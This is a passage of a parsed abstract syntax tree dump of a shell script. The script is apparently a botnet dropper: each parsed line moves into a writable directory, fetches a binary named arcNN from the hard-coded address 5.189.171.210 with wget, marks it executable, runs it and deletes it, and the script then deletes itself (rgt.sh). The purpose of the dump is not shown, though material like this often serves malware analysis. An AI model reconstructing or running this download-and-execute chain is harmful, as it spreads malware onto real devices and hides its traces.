  OperatorNode(lineno=15, op='||', pos=(1689, 1691)),
  CommandNode(lineno=15, pos=(1692, 1699), parts=[
    WordNode(lineno=15, pos=(1692, 1694), word='cd'),
    WordNode(lineno=15, pos=(1695, 1699), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1700, 1702)),
  CommandNode(lineno=15, pos=(1703, 1711), parts=[
    WordNode(lineno=15, pos=(1703, 1705), word='cd'),
    WordNode(lineno=15, pos=(1706, 1711), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1712, 1714)),
  CommandNode(lineno=15, pos=(1715, 1719), parts=[
    WordNode(lineno=15, pos=(1715, 1717), word='cd'),
    WordNode(lineno=15, pos=(1718, 1719), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1719, 1720)),
  CommandNode(lineno=15, pos=(1721, 1752), parts=[
    WordNode(lineno=15, pos=(1721, 1725), word='wget'),
    WordNode(lineno=15, pos=(1726, 1752), word='http://5.189.171.210/arc38'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1752, 1753)),
  CommandNode(lineno=15, pos=(1754, 1768), parts=[
    WordNode(lineno=15, pos=(1754, 1759), word='chmod'),
    WordNode(lineno=15, pos=(1760, 1762), word='+x'),
    WordNode(lineno=15, pos=(1763, 1768), word='arc38'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1768, 1769)),
  CommandNode(lineno=15, pos=(1770, 1777), parts=[
    WordNode(lineno=15, pos=(1770, 1777), word='./arc38'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1777, 1778)),
  CommandNode(lineno=15, pos=(1779, 1791), parts=[
    WordNode(lineno=15, pos=(1779, 1781), word='rm'),
    WordNode(lineno=15, pos=(1782, 1785), word='-rf'),
    WordNode(lineno=15, pos=(1786, 1791), word='arc38'),
  ]),
])
ListNode(lineno=16, pos=(1792, 1917), parts=[
  CommandNode(lineno=16, pos=(1792, 1799), parts=[
    WordNode(lineno=16, pos=(1792, 1794), word='cd'),
    WordNode(lineno=16, pos=(1795, 1799), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1800, 1802)),
  CommandNode(lineno=16, pos=(1803, 1814), parts=[
    WordNode(lineno=16, pos=(1803, 1805), word='cd'),
    WordNode(lineno=16, pos=(1806, 1814), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1815, 1817)),
  CommandNode(lineno=16, pos=(1818, 1825), parts=[
    WordNode(lineno=16, pos=(1818, 1820), word='cd'),
    WordNode(lineno=16, pos=(1821, 1825), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1826, 1828)),
  CommandNode(lineno=16, pos=(1829, 1837), parts=[
    WordNode(lineno=16, pos=(1829, 1831), word='cd'),
    WordNode(lineno=16, pos=(1832, 1837), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1838, 1840)),
  CommandNode(lineno=16, pos=(1841, 1845), parts=[
    WordNode(lineno=16, pos=(1841, 1843), word='cd'),
    WordNode(lineno=16, pos=(1844, 1845), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1845, 1846)),
  CommandNode(lineno=16, pos=(1847, 1878), parts=[
    WordNode(lineno=16, pos=(1847, 1851), word='wget'),
    WordNode(lineno=16, pos=(1852, 1878), word='http://5.189.171.210/arc48'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1878, 1879)),
  CommandNode(lineno=16, pos=(1880, 1894), parts=[
    WordNode(lineno=16, pos=(1880, 1885), word='chmod'),
    WordNode(lineno=16, pos=(1886, 1888), word='+x'),
    WordNode(lineno=16, pos=(1889, 1894), word='arc48'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1894, 1895)),
  CommandNode(lineno=16, pos=(1896, 1903), parts=[
    WordNode(lineno=16, pos=(1896, 1903), word='./arc48'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1903, 1904)),
  CommandNode(lineno=16, pos=(1905, 1917), parts=[
    WordNode(lineno=16, pos=(1905, 1907), word='rm'),
    WordNode(lineno=16, pos=(1908, 1911), word='-rf'),
    WordNode(lineno=16, pos=(1912, 1917), word='arc48'),
  ]),
])
ListNode(lineno=17, pos=(1918, 2043), parts=[
  CommandNode(lineno=17, pos=(1918, 1925), parts=[
    WordNode(lineno=17, pos=(1918, 1920), word='cd'),
    WordNode(lineno=17, pos=(1921, 1925), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1926, 1928)),
  CommandNode(lineno=17, pos=(1929, 1940), parts=[
    WordNode(lineno=17, pos=(1929, 1931), word='cd'),
    WordNode(lineno=17, pos=(1932, 1940), word='/var/run'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1941, 1943)),
  CommandNode(lineno=17, pos=(1944, 1951), parts=[
    WordNode(lineno=17, pos=(1944, 1946), word='cd'),
    WordNode(lineno=17, pos=(1947, 1951), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1952, 1954)),
  CommandNode(lineno=17, pos=(1955, 1963), parts=[
    WordNode(lineno=17, pos=(1955, 1957), word='cd'),
    WordNode(lineno=17, pos=(1958, 1963), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1964, 1966)),
  CommandNode(lineno=17, pos=(1967, 1971), parts=[
    WordNode(lineno=17, pos=(1967, 1969), word='cd'),
    WordNode(lineno=17, pos=(1970, 1971), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1971, 1972)),
  CommandNode(lineno=17, pos=(1973, 2004), parts=[
    WordNode(lineno=17, pos=(1973, 1977), word='wget'),
    WordNode(lineno=17, pos=(1978, 2004), word='http://5.189.171.210/arc58'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2004, 2005)),
  CommandNode(lineno=17, pos=(2006, 2020), parts=[
    WordNode(lineno=17, pos=(2006, 2011), word='chmod'),
    WordNode(lineno=17, pos=(2012, 2014), word='+x'),
    WordNode(lineno=17, pos=(2015, 2020), word='arc58'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2020, 2021)),
  CommandNode(lineno=17, pos=(2022, 2029), parts=[
    WordNode(lineno=17, pos=(2022, 2029), word='./arc58'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2029, 2030)),
  CommandNode(lineno=17, pos=(2031, 2043), parts=[
    WordNode(lineno=17, pos=(2031, 2033), word='rm'),
    WordNode(lineno=17, pos=(2034, 2037), word='-rf'),
    WordNode(lineno=17, pos=(2038, 2043), word='arc58'),
  ]),
])
ListNode(lineno=18, pos=(2044, 2169), parts=[
  CommandNode(lineno=18, pos=(2044, 2051), parts=[
    WordNode(lineno=18, pos=(2044, 2046), word='cd'),
    WordNode(lineno=18, pos=(2047, 2051), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2052, 2054)),
  CommandNode(lineno=18, pos=(2055, 2066), parts=[
    WordNode(lineno=18, pos=(2055, 2057), word='cd'),
    WordNode(lineno=18, pos=(2058, 2066), word='/var/run'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2067, 2069)),
  CommandNode(lineno=18, pos=(2070, 2077), parts=[
    WordNode(lineno=18, pos=(2070, 2072), word='cd'),
    WordNode(lineno=18, pos=(2073, 2077), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2078, 2080)),
  CommandNode(lineno=18, pos=(2081, 2089), parts=[
    WordNode(lineno=18, pos=(2081, 2083), word='cd'),
    WordNode(lineno=18, pos=(2084, 2089), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2090, 2092)),
  CommandNode(lineno=18, pos=(2093, 2097), parts=[
    WordNode(lineno=18, pos=(2093, 2095), word='cd'),
    WordNode(lineno=18, pos=(2096, 2097), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2097, 2098)),
  CommandNode(lineno=18, pos=(2099, 2130), parts=[
    WordNode(lineno=18, pos=(2099, 2103), word='wget'),
    WordNode(lineno=18, pos=(2104, 2130), word='http://5.189.171.210/arc64'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2130, 2131)),
  CommandNode(lineno=18, pos=(2132, 2146), parts=[
    WordNode(lineno=18, pos=(2132, 2137), word='chmod'),
    WordNode(lineno=18, pos=(2138, 2140), word='+x'),
    WordNode(lineno=18, pos=(2141, 2146), word='arc64'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2146, 2147)),
  CommandNode(lineno=18, pos=(2148, 2155), parts=[
    WordNode(lineno=18, pos=(2148, 2155), word='./arc64'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2155, 2156)),
  CommandNode(lineno=18, pos=(2157, 2169), parts=[
    WordNode(lineno=18, pos=(2157, 2159), word='rm'),
    WordNode(lineno=18, pos=(2160, 2163), word='-rf'),
    WordNode(lineno=18, pos=(2164, 2169), word='arc64'),
  ]),
])
ListNode(lineno=19, pos=(2170, 2295), parts=[
  CommandNode(lineno=19, pos=(2170, 2177), parts=[
    WordNode(lineno=19, pos=(2170, 2172), word='cd'),
    WordNode(lineno=19, pos=(2173, 2177), word='/tmp'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2178, 2180)),
  CommandNode(lineno=19, pos=(2181, 2192), parts=[
    WordNode(lineno=19, pos=(2181, 2183), word='cd'),
    WordNode(lineno=19, pos=(2184, 2192), word='/var/run'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2193, 2195)),
  CommandNode(lineno=19, pos=(2196, 2203), parts=[
    WordNode(lineno=19, pos=(2196, 2198), word='cd'),
    WordNode(lineno=19, pos=(2199, 2203), word='/mnt'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2204, 2206)),
  CommandNode(lineno=19, pos=(2207, 2215), parts=[
    WordNode(lineno=19, pos=(2207, 2209), word='cd'),
    WordNode(lineno=19, pos=(2210, 2215), word='/root'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2216, 2218)),
  CommandNode(lineno=19, pos=(2219, 2223), parts=[
    WordNode(lineno=19, pos=(2219, 2221), word='cd'),
    WordNode(lineno=19, pos=(2222, 2223), word='/'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2223, 2224)),
  CommandNode(lineno=19, pos=(2225, 2256), parts=[
    WordNode(lineno=19, pos=(2225, 2229), word='wget'),
    WordNode(lineno=19, pos=(2230, 2256), word='http://5.189.171.210/arc68'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2256, 2257)),
  CommandNode(lineno=19, pos=(2258, 2272), parts=[
    WordNode(lineno=19, pos=(2258, 2263), word='chmod'),
    WordNode(lineno=19, pos=(2264, 2266), word='+x'),
    WordNode(lineno=19, pos=(2267, 2272), word='arc68'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2272, 2273)),
  CommandNode(lineno=19, pos=(2274, 2281), parts=[
    WordNode(lineno=19, pos=(2274, 2281), word='./arc68'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2281, 2282)),
  CommandNode(lineno=19, pos=(2283, 2295), parts=[
    WordNode(lineno=19, pos=(2283, 2285), word='rm'),
    WordNode(lineno=19, pos=(2286, 2289), word='-rf'),
    WordNode(lineno=19, pos=(2290, 2295), word='arc68'),
  ]),
])
CommandNode(lineno=21, pos=(2297, 2310), parts=[
  WordNode(lineno=21, pos=(2297, 2299), word='rm'),
  WordNode(lineno=21, pos=(2300, 2303), word='-rf'),
  WordNode(lineno=21, pos=(2304, 2310), word='rgt.sh'),
])
